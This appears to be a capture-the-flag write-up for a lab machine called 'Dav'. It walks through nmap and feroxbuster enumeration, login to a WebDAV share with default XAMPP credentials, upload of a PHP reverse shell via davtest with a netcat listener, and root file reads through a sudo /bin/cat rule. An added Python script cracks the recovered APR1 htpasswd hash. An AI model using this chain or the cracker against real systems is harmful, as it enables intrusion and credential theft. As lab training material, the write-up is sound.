
Dav

This report details the exploitation of a misconfigured WebDAV service on the target system (10.10.168.117). Default XAMPP WebDAV credentials allowed a PHP reverse shell to be uploaded, giving command execution as the www-data user. A sudo rule permitting /bin/cat to be run as root without a password then gave arbitrary file read as root, which was sufficient to retrieve the root flag.

1. Reconnaissance and Enumeration

1.1. Port Scanning

export TARGET_IP=10.10.168.117  # Best practice: define target at the beginning
nmap -p- --min-rate 5000 $TARGET_IP

Results:

PORT   STATE SERVICE
80/tcp open http

Interpretation:

  • Only port 80 (HTTP) was open across the full TCP range, so the web server is the only exposed TCP service and the sole entry point.

1.2. Web Directory Enumeration

The feroxbuster tool was used to enumerate directories and files on the web server, utilizing a common wordlist. This helps identify hidden or less obvious resources.

feroxbuster -u http://$TARGET_IP -w /usr/share/wordlists/dirb/common.txt

Results:

401      GET       14l       54w      460c http://10.10.168.117/webdav

Interpretation:

  • A directory /webdav was discovered that returns 401 (Unauthorized): the server requires HTTP authentication for that path, and the name points to a WebDAV share. The next step is therefore credential guessing against that path rather than further directory brute-forcing.

2. Vulnerability Analysis and Exploitation: WebDAV

2.1. WebDAV Authentication Bypass (Default Credentials)

The 401 response on /webdav prompted a search for default WebDAV credentials. Public references on XAMPP (blog posts and forum discussions) note that its bundled WebDAV configuration ships with the default credentials wampp:xampp. These credentials authenticated successfully to the /webdav service.

2.2. File Enumeration

After successful authentication, the directory listing was explored.

  • Discovered passwd.dav containing wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91
  • This is an Apache htpasswd entry; the $apr1$ prefix marks the APR1 MD5-crypt format. The credential store protecting the share is itself readable through the share, so even without knowing the default password the hash could have been cracked offline.
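The entry in passwd.dav is an APR1 MD5-crypt hash: a salted, 1000-round MD5 construction that is fast to compute and therefore cheap to attack once exposed. The following Python is an added example and is not part of the original writeup. It implements the APR1 algorithm as Apache's htpasswd uses it, parses the line recovered above, and tests a small candidate list against it; the candidate list and the helper names (apr1_hash, apr1_verify, parse_htpasswd, crack) are illustrative choices, not tooling used during the engagement. Running it shows whether the wampp:xampp credentials used above correspond to the stored hash.

```python
"""Verify and crack Apache htpasswd APR1-MD5 entries such as the one in passwd.dav.

Added example, not from the original writeup. The algorithm is Apache's apr1
variant of MD5-crypt (magic string "$apr1$", 1000 rounds). The hash line is
the one recovered from passwd.dav; the candidate list is constructed.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = "$apr1$"

# Line recovered from /webdav/passwd.dav in the writeup above.
PASSWD_DAV = "wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91"


def _to64(value: int, count: int) -> str:
    """Encode `count` 6-bit groups of `value`, least significant group first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_hash(password: str, salt: str) -> str:
    """Return the htpasswd-style "$apr1$<salt>$<digest>" string for password/salt."""
    pw = password.encode()
    salt = salt[:8]  # Apache uses at most 8 salt characters
    salt_b = salt.encode()

    ctx = hashlib.md5(pw + MAGIC.encode() + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    # Mix in len(pw) bytes of the alternate digest, repeating it as needed.
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[: min(16, remaining)])
        remaining -= 16
    # Quirk of the original algorithm: one byte per bit of the password length.
    bits = len(pw)
    while bits:
        ctx.update(b"\0" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()

    # 1000 slow-down rounds, each permuting which inputs are hashed.
    for i in range(1000):
        ctx = hashlib.md5()
        ctx.update(pw if i & 1 else final)
        if i % 3:
            ctx.update(salt_b)
        if i % 7:
            ctx.update(pw)
        ctx.update(final if i & 1 else pw)
        final = ctx.digest()

    # Reorder the digest bytes and encode them with the crypt alphabet.
    digest = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        digest += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    digest += _to64(final[11], 2)
    return f"{MAGIC}{salt}${digest}"


def apr1_verify(password: str, stored: str) -> bool:
    """Check a candidate password against a stored "$apr1$salt$digest" entry."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        return False  # not an APR1 entry (e.g. $1$, bcrypt or SHA1 htpasswd formats)
    return apr1_hash(password, parts[2]) == stored


def parse_htpasswd(text: str) -> dict:
    """Parse htpasswd-format text into {user: stored_hash}, skipping blanks and comments."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, stored = line.split(":", 1)
        entries[user] = stored
    return entries


def crack(entries: dict, candidates: list) -> dict:
    """Return {user: password} for every entry matched by some candidate."""
    found = {}
    for user, stored in entries.items():
        for cand in candidates:
            if apr1_verify(cand, stored):
                found[user] = cand
                break
    return found


if __name__ == "__main__":
    # Constructed candidate list: the XAMPP default plus a few common guesses.
    candidates = ["xampp", "wampp", "admin", "password"]
    print(crack(parse_htpasswd(PASSWD_DAV), candidates) or "no candidate matched")
```

In practice the same check is a one-liner with existing tooling (for example hashcat mode 1600 for Apache $apr1$ hashes); the point of spelling it out is that the whole construction is salted MD5 with a fixed 1000-round loop, so a readable htpasswd file behind a WebDAV share is a credential disclosure, not a hardened secret.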

2.3. WebDAV File Upload (Reverse Shell)

The davtest tool was used to confirm that files could be uploaded to the WebDAV share. By default it uploads test files with a range of extensions and reports which are accepted and which execute; with -uploadfile and -uploadloc it uploads a chosen file instead. A PHP reverse shell generated on revshells.com (the PentestMonkey php-reverse-shell) was used, with the callback address set to the attacker's listener.

davtest -auth wampp:xampp -url http://10.10.168.117/webdav -uploadfile phppentestmonkey.php -uploadloc phppentestmonkey.php

Results:

********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.168.117/webdav
********************************************************
Uploading file
Upload succeeded: http://10.10.168.117/webdav/phppentestmonkey.php

Interpretation:

  • davtest confirmed that authenticated file uploads were possible and that a .php file was accepted. The PHP reverse shell now sits at http://10.10.168.117/webdav/phppentestmonkey.php, within the web root, so requesting it will execute it.

2.4. Gaining a Shell

A Netcat listener was established on the attacker's machine to receive the reverse shell connection.

nc -lvnp 6666

The uploaded PHP reverse shell (phppentestmonkey.php) was then accessed via a web browser (or curl), triggering the connection back to the listener. This established a command shell on the target system.

# Commands executed *after* gaining the shell:
id
# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

3. Privilege Escalation

3.1. sudo Misconfiguration

The sudo -l command was executed to determine if the current user (www-data) had any elevated privileges via sudo.

sudo -l
# Output: (ALL) NOPASSWD: /bin/cat

Interpretation:

  • The www-data user may run /bin/cat as any user, including root, without a password. This is an arbitrary file read as root rather than a direct root shell, but it suffices to read any file on the system.

3.2. Gaining Root Access

The sudo rule was used to read /root/root.txt, which is normally readable only by root.

sudo cat /root/root.txt